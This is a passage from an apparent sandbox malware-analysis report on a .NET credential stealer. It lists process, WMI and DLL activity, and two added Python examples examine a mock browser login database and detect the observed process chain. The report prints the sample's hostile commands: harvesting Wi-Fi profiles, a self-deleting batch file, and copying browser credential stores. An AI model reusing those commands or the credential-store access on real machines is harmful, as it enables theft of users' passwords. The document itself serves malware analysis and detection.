                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_0183E998
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_01837D70
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_0183E988
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_018358B3
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_018358C8
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_08713148
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_0871B9A0
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_08716A48
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_08713A18
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_0871EDB0
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_0871E06C
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_0871E19D
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_0871E4EF
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_08712E00
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_088906E8
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_088906E2
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4524 -s 3784
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000033E7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsedge.exe> vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000033E7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.000000000388A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamechrome.exe< vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.000000000388A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108442326680.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameStealer.exeJ vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe | Binary or memory string: OriginalFilenameStealer.exeJ vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, ChromeDevToolsWrapper.cs | Suspicious URL: 'https://avito.ru', 'https://rambler.ru', 'https://yandex.ru'
                        Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@25/18@3/2
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_08714B50 CreateToolhelp32Snapshot
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8580:304:WilStaging_02
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Mutant created: NULL
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8580:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6620:304:WilStaging_02
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:304:WilStaging_02
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6620:120:WilError_03
                        Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4524
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | File created: C:\Users\user\AppData\Local\Temp\h5d0oy2n.wjl
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat
                        Source: zyEDYRU0jw.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: zyEDYRU0jw.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 4524)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | File read: C:\Users\user\Desktop\desktop.ini
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004508000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BD05000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004529000.00000004.00000800.00020000.00000000.sdmp, tmp61EA.tmp.dat.0.dr, tmp61E9.tmp.dat.0.dr, tmp61E8.tmp.dat.0.dr | Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000035BF000.00000004.00000800.00020000.00000000.sdmp, tmp61E6.tmp.dat.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004490000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004454000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004472000.00000004.00000800.00020000.00000000.sdmp, tmp61B6.tmp.dat.0.dr, tmp61B4.tmp.dat.0.dr, tmp61B5.tmp.dat.0.dr | Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
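The CREATE TABLE strings above are browser SQLite schemas (Chromium/Edge "Login Data" and "Web Data") that the sample reads from the tmp*.tmp.dat copies it drops in %TEMP%; the live files are held open by the browser, so a copy is the normal way a collector gets at them, and such copies are a useful forensic artifact. What follows is an added example written for this page, not code from the report or from the Arcane sample. It builds a small Login Data-style store from the password_notes schema quoted in the report plus an assumed minimal logins table with constructed rows, opens it read-only and lists what a collector would obtain per login. The practical point it shows is that password_value holds ciphertext: the prefix-to-scheme mapping in classify_blob (Chromium's "v10" AES-GCM format keyed from the profile's Local State, and raw DPAPI blobs in older profiles) is general Chromium knowledge, not something the report states, and the file name, column subset and row contents are assumptions.

```python
"""
Added example, not from the Joe Sandbox report: read a Chromium "Login Data"
style SQLite store the way an analyst examines one of the tmp*.tmp.dat copies
listed above.  PASSWORD_NOTES_DDL is the schema quoted in the report; the
logins table is an assumed minimal subset of the real one, and all rows are
constructed test data (no real credentials or ciphertext).
"""
import os
import pathlib
import sqlite3
import tempfile

PASSWORD_NOTES_DDL = (
    "CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, "
    "parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE "
    "DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, "
    "date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key))"
)
# Assumption: only the columns a collector cares about; the real table has many more.
LOGINS_DDL = (
    "CREATE TABLE logins (id INTEGER PRIMARY KEY AUTOINCREMENT, "
    "origin_url VARCHAR NOT NULL, username_value VARCHAR, password_value BLOB)"
)


def classify_blob(blob):
    """Name the at-rest protection scheme from the blob prefix (general Chromium
    knowledge, not something the report states)."""
    if blob[:3] in (b"v10", b"v11"):
        return "chromium-os-crypt-" + blob[:3].decode()   # AES-GCM, key in Local State
    if blob[:4] == b"\x01\x00\x00\x00":
        return "dpapi-blob"                               # CryptProtectData output
    return "unrecognized"


def build_sample_db(path):
    """Create a throwaway store with two constructed logins and one note."""
    con = sqlite3.connect(path)
    con.execute(LOGINS_DDL)
    con.execute(PASSWORD_NOTES_DDL)
    con.executemany(
        "INSERT INTO logins (origin_url, username_value, password_value) VALUES (?, ?, ?)",
        [
            ("https://example.test/login", "alice", b"v10" + bytes(range(12)) + b"\xaa" * 24),
            ("https://mail.example.test", "bob", b"\x01\x00\x00\x00" + b"\xbb" * 40),
        ],
    )
    con.execute(
        "INSERT INTO password_notes (parent_id, key, value, date_created, confidential) "
        "VALUES (1, 'recovery', X'00', 0, 1)"
    )
    con.commit()
    con.close()


def inspect_login_store(path):
    """Open the copy read-only and list what a collector would obtain per login."""
    uri = pathlib.Path(path).resolve().as_uri() + "?mode=ro"
    con = sqlite3.connect(uri, uri=True)
    rows = con.execute(
        "SELECT l.origin_url, l.username_value, l.password_value, group_concat(n.key) "
        "FROM logins l LEFT JOIN password_notes n ON n.parent_id = l.id "
        "GROUP BY l.id ORDER BY l.id"
    ).fetchall()
    con.close()
    return [
        {
            "origin": origin,
            "username": user,
            "scheme": classify_blob(blob or b""),
            "cipher_len": len(blob or b""),
            "note_keys": sorted(keys.split(",")) if keys else [],
        }
        for origin, user, blob, keys in rows
    ]


def demo():
    """Build the sample store in a temp dir, inspect it, and return the records."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "tmp_login_data.dat")
        build_sample_db(path)
        return inspect_login_store(path)


if __name__ == "__main__":
    for rec in demo():
        print(rec)
```

Opening the copy with mode=ro matters in practice: an analyst working on an evidence copy should never let SQLite create a journal or WAL beside it. Because the password_value column is ciphertext bound to the victim's DPAPI context, a stealer has to run as that user on that machine, which is exactly what the process tree in this report shows.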
                        Source: zyEDYRU0jw.exe | ReversingLabs: Detection: 63%
                        Source: unknown | Process created: C:\Users\user\Desktop\zyEDYRU0jw.exe "C:\Users\user\Desktop\zyEDYRU0jw.exe"
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr All
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 4524
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4524 -s 3784
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr All
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 4524
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
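The process rows above give a detection engineer a concrete chain: a .NET binary started from the user's Desktop spawns cmd.exe for `tasklist`, for `chcp 65001 && netsh wlan show profiles | findstr All` (the UTF-8 code page keeps non-ASCII SSIDs readable, and `findstr All` keeps only the "All User Profile" lines of the netsh output), and for a batch file that deletes itself after running `TaskKill /F /IM 4524` and `Timeout /T 2 /Nobreak`. Note that `/IM` expects an image name, so handing it the PID 4524 does not terminate the sample; `/PID` would. The Python below is an added example written for this page, not part of the report: it runs simple rules over process-creation events constructed to mirror those rows, walks each flagged process up through cmd.exe to the binary that started the chain, and alerts only when one binary from a user-writable path accounts for two or more of the techniques, so a single `netsh wlan show profiles` typed from an admin console does not fire. The event fields, all PIDs other than 4524, and the benign control event are assumptions.

```python
"""
Added example, not part of the Joe Sandbox report: rule-based detection for
the process chain recorded above.  Events, field names, the benign control
event and every PID except the sample's 4524 are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    parent_image: str
    image: str
    cmdline: str


# Constructed sample telemetry modelled on the report's "Process created" rows.
SAMPLE_EVENTS = [
    ProcEvent(4524, 900, r"C:\Windows\explorer.exe", r"C:\Users\user\Desktop\zyEDYRU0jw.exe",
              r'"C:\Users\user\Desktop\zyEDYRU0jw.exe"'),
    ProcEvent(1001, 4524, r"C:\Users\user\Desktop\zyEDYRU0jw.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'"cmd.exe" /c tasklist'),
    ProcEvent(1002, 4524, r"C:\Users\user\Desktop\zyEDYRU0jw.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'"cmd" /C chcp 65001 && netsh wlan show profiles | findstr All'),
    ProcEvent(1003, 1002, r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\netsh.exe",
              r"netsh wlan show profiles"),
    ProcEvent(1004, 4524, r"C:\Users\user\Desktop\zyEDYRU0jw.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat'
              r" & Del C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat"),
    ProcEvent(1005, 1004, r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\taskkill.exe",
              r"TaskKill /F /IM 4524"),
    # Benign control: an admin listing Wi-Fi profiles from a system-owned shell.
    ProcEvent(2001, 700, r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd /c netsh wlan show profiles"),
]

# Each rule names one technique visible in the report's command lines.
RULES = [
    ("process_enum", re.compile(r"\btasklist\b", re.I)),
    ("utf8_codepage_switch", re.compile(r"\bchcp\s+65001\b", re.I)),
    ("wlan_profile_harvest", re.compile(r"\bnetsh\s+wlan\s+show\s+profiles?\b", re.I)),
    # "/C <x>.bat & del <x>.bat": a batch file that erases itself after running.
    ("self_delete_batch", re.compile(r"/c\s+(?P<bat>\S+\.bat)\s*&\s*del\s+(?P=bat)", re.I)),
    ("taskkill_force", re.compile(r"\btaskkill\b.*\s/F\b", re.I)),
    # /IM takes an image name; a bare number is the report's "TaskKill /F /IM 4524".
    ("taskkill_im_pid", re.compile(r"\btaskkill\b.*/IM\s+\d+\s*$", re.I)),
]

USER_WRITABLE = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\(Desktop|Downloads|AppData)\\", re.I)


def techniques(ev):
    """Names of the rules whose pattern occurs in the event's command line."""
    return [name for name, rx in RULES if rx.search(ev.cmdline)]


def origin_of(ev, by_pid):
    """Walk up through cmd.exe parents to the process that started the chain."""
    cur = ev
    while cur.ppid in by_pid and by_pid[cur.ppid].image.lower().endswith("\\cmd.exe"):
        cur = by_pid[cur.ppid]
    return cur.parent_image, cur.ppid


def correlate(events, min_techniques=2):
    """Alert when one binary from a user-writable path accounts for several techniques."""
    by_pid = {ev.pid: ev for ev in events}
    seen = {}  # (origin_image, origin_pid) -> (technique names, child pids)
    for ev in events:
        hits = techniques(ev)
        if not hits:
            continue
        techs, pids = seen.setdefault(origin_of(ev, by_pid), (set(), set()))
        techs.update(hits)
        pids.add(ev.pid)
    alerts = []
    for (image, pid), (techs, pids) in seen.items():
        if len(techs) >= min_techniques and USER_WRITABLE.match(image):
            alerts.append({"origin_image": image, "origin_pid": pid,
                           "techniques": sorted(techs), "child_pids": sorted(pids)})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The correlation step is what keeps this usable: each rule on its own (tasklist, chcp 65001, netsh wlan) is noisy, but several of them hanging off one executable in Desktop, Downloads or AppData within a short window is the shape this report documents. Feeding real Sysmon event ID 1 or EDR process telemetry into ProcEvent is a matter of mapping the image, parent image, PID and parent PID fields.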
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: version.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: edgegdi.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: cryptsp.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: rsaenh.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: rasapi32.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: rasman.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: rtutils.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: dwrite.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: mswsock.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: winhttp.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: iphlpapi.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: windowscodecs.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: dhcpcsvc.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: dnsapi.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: winnsi.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: rasadhlp.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: fwpuclnt.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: edputil.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: napinsp.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: pnrpnsp.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: wshbth.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: nlaapi.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: winrnr.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: wbemcomn.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: amsi.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: userenv.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: ntmarta.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: dpapi.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: secur32.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: schannel.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: mskeyprotect.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: ntasn1.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: ncrypt.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: ncryptsslp.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: msasn1.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: gpapi.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: propsys.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: urlmon.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: iertutil.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: srvcli.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: netutils.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: wintypes.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: appresolver.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: bcp47langs.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: slc.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: sppc.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: edgegdi.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\chcp.com | Section loaded: ulib.dll
                        Source: C:\Windows\SysWOW64\chcp.com | Section loaded: fsutilext.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ifmon.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: iphlpapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasmontr.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasapi32.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpuclnt.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mfc42u.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: edgegdi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: authfwcfg.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpolicyiomgr.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: firewallapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dnsapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwbase.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcmonitor.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3cfg.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3api.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: onex.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappcfg.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ncrypt.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappprxy.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ntasn1.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwcfg.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: hnetmon.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netshell.dll
